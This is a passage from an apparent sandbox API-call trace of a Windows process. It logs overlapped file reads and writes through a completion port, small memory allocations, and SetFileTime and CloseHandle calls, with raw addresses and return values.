lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.343] GetLastError () returned 0x3e5 [0077.343] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.344] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.344] CloseHandle (hObject=0x3c0) returned 1 [0077.347] free (_Block=0x20ebb50) [0077.347] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.462] WriteFile (in: hFile=0x3b0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.462] GetLastError () returned 0x3e5 [0077.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.544] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.544] CloseHandle (hObject=0x3c0) returned 1 [0077.546] free (_Block=0x3940048) [0077.546] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.574] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.574] GetLastError () returned 0x3e5 [0077.575] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.589] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0077.589] GetLastError () returned 0x3e5 [0077.589] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.636] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.636] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.636] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.636] free (_Block=0x2060778) [0077.636] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.636] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.637] free (_Block=0x2062da0) [0077.638] free (_Block=0x53fcc0) [0077.638] free (_Block=0x2062eb8) [0077.638] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.639] GetLastError () returned 0x3e5 [0077.639] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.735] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.736] GetLastError () returned 0x3e5 [0077.736] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.782] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.882] GetLastError () returned 0x3e5 [0077.882] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.075] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.075] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.075] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.076] free (_Block=0x2060778) [0078.076] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.076] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.077] free (_Block=0x2062da0) [0078.077] free (_Block=0x53fcc0) [0078.077] free (_Block=0x2062eb8) [0078.077] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.077] GetLastError () returned 0x3e5 [0078.077] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.158] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x30200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.159] GetLastError () returned 0x3e5 [0078.159] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.169] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.169] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.169] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.169] free (_Block=0x2060778) [0078.169] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.169] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.170] free (_Block=0x2062da0) [0078.170] free (_Block=0x53fcc0) [0078.171] free (_Block=0x2062eb8) [0078.171] WriteFile (in: hFile=0x3b4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.171] GetLastError () returned 0x3e5 [0078.171] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.192] WriteFile (in: hFile=0x3b4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x36c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.193] GetLastError () returned 0x3e5 [0078.193] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.205] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.205] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.205] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.205] free (_Block=0x2060778) [0078.205] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.205] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.206] free (_Block=0x2062da0) [0078.206] free (_Block=0x53fcc0) [0078.207] free (_Block=0x2062eb8) [0078.207] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.207] GetLastError () returned 0x3e5 [0078.207] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.233] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.233] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.233] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.234] free (_Block=0x2060778) [0078.234] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.234] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.235] free (_Block=0x2062da0) [0078.235] free (_Block=0x53fcc0) [0078.236] free (_Block=0x2062eb8) [0078.236] WriteFile (in: hFile=0x3b0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.236] GetLastError () returned 0x3e5 [0078.236] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.240] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.240] GetLastError () returned 0x3e5 [0078.240] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.259] WriteFile (in: hFile=0x3b0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.259] GetLastError () returned 0x3e5 [0078.259] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.267] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.267] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.267] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.268] free (_Block=0x2060778) [0078.268] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.268] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.268] free (_Block=0x2062da0) [0078.269] free (_Block=0x53fcc0) [0078.269] free (_Block=0x2062eb8) [0078.269] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0078.269] GetLastError () returned 0x3e5 [0078.269] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.285] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0078.286] GetLastError () returned 0x3e5 [0078.286] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.422] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.422] GetLastError () returned 0x3e5 [0078.422] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.422] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.423] CloseHandle (hObject=0x3b0) returned 1 [0078.426] free (_Block=0x206b860) [0078.426] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.742] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.742] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.742] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.743] free (_Block=0x2060778) [0078.743] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.743] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.744] free (_Block=0x2062da0) [0078.744] free (_Block=0x53fcc0) [0078.744] free (_Block=0x2062eb8) [0078.745] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.745] GetLastError () returned 0x3e5 [0078.745] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.767] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.767] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.768] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.768] free (_Block=0x2060778) [0078.768] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.768] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.769] free (_Block=0x2062da0) [0078.769] free (_Block=0x53fcc0) [0078.770] free (_Block=0x2062eb8) [0078.770] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0078.771] GetLastError () returned 0x3e5 [0078.771] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.791] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.792] CloseHandle (hObject=0x3b0) returned 1 [0078.795] free (_Block=0x206b860) [0078.795] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.814] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.814] CloseHandle (hObject=0x3b4) returned 1 [0078.819] free (_Block=0x20abae0) [0078.819] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.827] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.827] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.827] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.828] free (_Block=0x2060778) [0078.828] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.828] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.828] free (_Block=0x2062da0) [0078.829] free (_Block=0x53fcc0) [0078.829] free (_Block=0x2062eb8) [0078.829] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.829] GetLastError () returned 0x3e5 [0078.829] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.831] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.831] CloseHandle (hObject=0x3bc) returned 1 [0078.836] free (_Block=0x3940048) [0078.836] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0078.836] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.837] GetLastError () returned 0x3e5 [0078.837] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.192] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.192] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.192] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.193] free (_Block=0x2060778) [0079.193] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.193] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.194] free (_Block=0x2062da0) [0079.194] free (_Block=0x53fcc0) [0079.194] free (_Block=0x2062eb8) [0079.194] WriteFile (in: hFile=0x3bc, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.195] GetLastError () returned 0x3e5 [0079.195] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.218] WriteFile (in: hFile=0x3bc, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.218] GetLastError () returned 0x3e5 [0079.218] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.243] ReadFile (in: hFile=0x3b4, lpBuffer=0x394007c, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0079.244] GetLastError () returned 0x3e5 [0079.244] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.251] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.251] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.252] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.252] free (_Block=0x2060778) [0079.252] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.252] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.253] free (_Block=0x2062da0) [0079.253] free (_Block=0x53fcc0) [0079.254] free (_Block=0x2062eb8) [0079.254] WriteFile (in: hFile=0x3b0, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0079.254] GetLastError () returned 0x3e5 [0079.255] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.787] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.787] CloseHandle (hObject=0x3bc) returned 1 [0079.791] free (_Block=0x3940048) [0079.791] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.800] WriteFile (in: hFile=0x3b0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.800] GetLastError () returned 0x3e5 [0079.800] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.810] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.810] GetLastError () returned 0x3e5 [0079.811] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0079.830] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.831] 